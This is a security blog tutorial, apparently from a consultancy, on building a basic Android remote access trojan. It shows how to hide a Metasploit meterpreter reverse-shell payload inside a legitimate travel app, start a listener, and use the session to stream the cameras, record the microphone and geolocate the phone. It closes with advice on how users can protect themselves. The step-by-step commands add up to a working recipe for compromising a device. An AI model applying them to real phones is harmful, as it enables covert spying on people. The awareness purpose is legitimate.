Backdooring Android Apps for Dummies

TL;DR – In this post, we’ll explore some mobile malware: how to create them, what they can do, and how to avoid them. Are you interested in learning more about how to protect your phone from shady figures? Then this blog post is for you.

Introduction

We all know the classic ideas about security on the desktop: install an antivirus, don’t click suspicious links, don’t go to shady websites. Those that take it even further might place a sticker over the webcam of their laptop, because that is the responsible thing to do, right?

But why do most people not apply this logic when it comes to their smartphones? If you think about it, a mobile phone is the ideal target for hackers to gain access to. After all, they often come with not one, but two cameras, a microphone, a GPS antenna, speakers, and they contain a boatload of useful information about us, our friends and the messages we send them. Oh, and of course we take our phone with us, everywhere we go.

In other words, gaining remote access to someone’s mobile device enables an attacker to do all kinds of unsavoury things. In this blog post I’ll explore just how easy it can be to generate a rudimentary Android remote administration trojan (or RAT, for short).

  • Do you simply want to know how to avoid these types of attacks? Then I suggest you skip ahead to the section “How to protect yourself” further down the blog post.
  • Do you want to learn the ins and outs of mobile malware making? Then the following section will guide you through the basics, step by step.

It’s important to know this metasploit RAT is a very well-known malware strain that is immediately detected by practically any AV solution. This tutorial speaks of a rudimentary RAT because it lacks a lot of functionality you would find in actual malware in the wild, such as obfuscation to remain undetected, or persistence to gain access to the device even when the app is closed. Because we are simply researching the possibilities of these types of malware and are not looking to attack a real target, this method will do just fine for this tutorial.

Cooking yourself some mobile malware; a recipe

Ingredients

  • A recent Kali VM with the latest Metasploit Framework installed
  • A spare Android device
  • [Optional] A copy of a legitimate Android app (.apk)

Instructions

Step 1 – Find out your IP address

To generate the payload, we will need to find out some more information about our own system. The first piece of information we’ll get is our system’s IP address. For the purpose of this blog post we’ll use our local IP address but in the real world you’d likely use your external IP address in order to allow infected devices to connect back to you.

Our IP address can simply be found by opening a terminal window, and typing the following command:

ip a

The address I will use is the one from the eth0 network adapter, more specifically the local IPv4 address as circled in the screenshot.

Step 2 – Generate the payload

This is where the real work happens: we’ll generate our payload using msfvenom, a payload generator included in the Metasploit Framework.

Before you start, make sure you have the following ready:

  1. Your IP address as found in the previous step
  2. Any unused port to run the exploit handler on
  3. (Optional) A legitimate app to hide the backdoor in

We have two options: either we generate the payload standalone, or we hide it as part of an existing legitimate app. While the former is easier, we will go a step further and use an old version of a well-known travel application to disguise our malware.

To do this, open a new terminal window and navigate to the folder containing the legitimate copy of the app you want to backdoor, then run the following command:

msfvenom -p android/meterpreter/reverse_tcp LHOST=<your_ip_address> LPORT=<your unused port> -x <legitimate app> -k -o <output name>

For this blog post, I used the following values:

  • <your ip address> = 192.168.43.6
  • <your unused port> = 4444
  • <legitimate app> = tripadvisor.apk
  • <output name> = ta-rat.apk

Step 3 – Test the malware

Having our payload is all fine and dandy, but in order to send commands to it, we need to start a listener on our kali VM on the same port we used to create our malware. To do this, run the following commands:

msfconsole
use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost <your ip address>
set lport <your unused port>

run

Now that we have our listener set up and ready to accept connections, all that remains for us to do is run the malware on our spare Android phone.

For the purposes of this blogpost, I simply transferred the .apk file to the device’s internal storage and ran it. As you can see in the screenshot, the backdoored application requires quite a lot more permissions than the original does.

The original app permissions (left) and the malicious app permissions (right)

All that’s left now is to run the malicious app, and …

We’re in!

Step 4: Playing around with the meterpreter session

Congratulations! If you successfully reached this step, it means you have a working meterpreter session opened on your terminal window and you have pwned the Android phone. So, let’s take a look at what we can do now, shall we?

Activating the cameras

We can get a glimpse into who our victim is by activating either the front or the rear camera of the device. To do this, type the following command in your meterpreter shell:

webcam_stream -i <index>

Where <index> is the index of the camera you want to use. In my experience, the rear camera was index 1, while the selfie camera was at index 2.

Recording the microphone

Curious about what’s being said in the victim’s vicinity? Try recording the microphone by typing:

record_mic -d <duration>

Where <duration> is the duration you want to record in seconds. For example, to record 15 seconds of audio with the device’s built-in microphone, run:

record_mic -d 15

Geolocation

We can also find out our victim’s exact location by typing:

geolocate

This command will give us the GPS coordinates of the device, which we can simply look up in Google Maps.

Playing an audio file

To finish up, we can play any .wav audio file we have on our system, by typing:

play <filename>.wav

For example:

play astley.wav

Experimenting with other functionality

Of course, these are just a small set of commands the meterpreter session has to offer. For a full list of functionalities, simply type:

help

Or for more information on a specific command, type:

<command> -h

And play around a bit to see what you can do!

Caveats

During my initial attempts to get this to work, there were a few difficulties that you might also run into. The most difficult part in the process is finding an app to add the backdoor to. Most recent android apps prevent you from easily decompiling and repackaging them by employing various obfuscation techniques that make it much more difficult to insert the malicious code. For this exercise, I went with an old version of a well known travel app that did not (yet) implement these techniques, as trying to backdoor any of the more recent versions proved unsuccessful.

This is further strengthened by the fact that Android’s permissions API is constantly evolving to prevent this type of abuse by malicious apps. Therefore, it’s not possible to get this exploit to work on the newest Android versions that require explicit user approval before granting the app any dangerous permissions at runtime. That said though, if you are an Android phone user reading this post, be aware that new malware variants constantly see the light of the day, and you should always think twice before granting any application a permission on your phone it does not strictly require. Yes, even if you have the latest safety updates on your device. Even though the methods described in this blog post only work for less recent versions of Android, considering that these versions represent the majority of the Android market share, an enormous number of devices remain vulnerable to this exploit to this day.

There exist some third-party tools and scripts on the internet that promise to achieve more reliable results in backdooring even more recent android apps. However, in my personal experience these tools did not always live up to their expectations. Your mileage may vary in trying these out, but in any case, don’t blindly trust the ReadMe of code you find on the internet: check it yourself and make sure you understand what it does before you run it.

How to protect yourself

Simply put, protecting yourself against these types of attacks starts with realising how these threats make their way onto your system. Your phone already takes a lot of security precautions against malicious applications, so its a good start to always make sure your phone is running the latest update. Additionally, you will need to think twice: once when you choose to install the application, and one more time when you choose to grant the application certain permissions.

First, only install apps from the official app store. Seriously. The app stores for both Android and iOS are strictly curated and scanned for viruses. Is it impossible that a malicious app sneaks by their controls? Not entirely, but it is highly unlikely that it will stay in the store for long until it’s noticed and removed. On iOS, you don’t have much of a choice anyway: if you have not jailbroken your device, you are already restricted to the App Store. For Android, there’s a setting that also allows you to install apps from untrusted sources. If you simply want to enjoy the classic experience your smartphone offers you, you won’t need to touch that setting at all: the google play store likely has everything you’d ever want to do. If you are a more advanced user who wants to be able to fully customise their phone and even root it or add custom ROMs: be my guest, but be extra careful when installing anything on your phone, as you lose a large amount of protections the google play store offers you. Experimenting with your phone is fine, but you need to be very aware of the additional risks you are taking. That goes double if you are downloading unofficial apps from third party sources.

Second, not all apps need all the permissions they ask for. A flashlight application does not need access to your microphone to function properly, so why would you grant it that permission? If you are installing an application and the permission list seems suspiciously long, or certain items definitely are not needed for that app to function, maybe reconsider installing it in the first place, and definitely do NOT give it those permissions. In the best case, they are invading your privacy by tracking you for advertising. In the worst case, a criminal might be trying to exploit the permissions to spy on you.

One last tip I’d like to give is to leave the security settings on your device enabled. It doesn’t matter if you have an iPhone or an Android phone: both iOS and Android have some great security options built in. This also means you won’t need third party antivirus apps on your phone. Often, these apps provide little extra functionality as they are much more restricted in what they can do as compared to what the native security features of your mobile phone OS are already doing.

Conclusion

If there is anything I’d like you to remember from reading this blog post, it’s the following two points:

1. Creating Mobile Malware is Easy. Almost too easy.

This blog post went over the steps to take in order to make a rudimentary Android malware, demonstrating how easy it can be to compromise a smartphone. With a limited set of tools, we can generate and hide a meterpreter reverse shell payload into an existing app, repackage it and install it on an Android device. Anyone with enough motivation to do this can learn it in a limited time frame. There is no need for a large amount of technical knowledge in order to learn this.

2. Smartphones are computers, they need to be protected.

It might not look like one, but a smartphone is a computer just like the one sitting on your desk. These devices are equally vulnerable to malware, and even though the creators of these devices already take a lot of precautions, the user is in the end responsible to keep their device safe. Smartphone users should be aware of the risks their devices face and stay away from unofficial applications outside of the app store, enable the security settings on their devices and be careful to grant excessive permissions to apps, especially from untrusted sources.

About the Author

Jonah is a consultant in the Cyber Strategy & Culture team at NVISO. He taps into the knowledge of his technical background to help organisations build out their cyber security strategy. He has a strong interest in ICT law and privacy regulation, as well as the ethical aspects of IT. In his personal life, he enjoys video & board games, is a licensed ham radio operator, likes fidgeting around with small DIY projects, and secretly dreams about one day getting his private pilot’s license (PPL).

Find out more about Jonah on his personal website or on Linkedin.

Published by Jonah Bellemans

Cyber Strategy & Culture Consultant @ NVISO. Interested in ICT & IP Law, Privacy and Ethics.

Join the Conversation

5 Comments

  1. this method is in practical doesn’t work that fine because there no practical way to bypass the security of the android system because it always detect the app (payload).

Leave a comment

Leave a Reply

%d bloggers like this: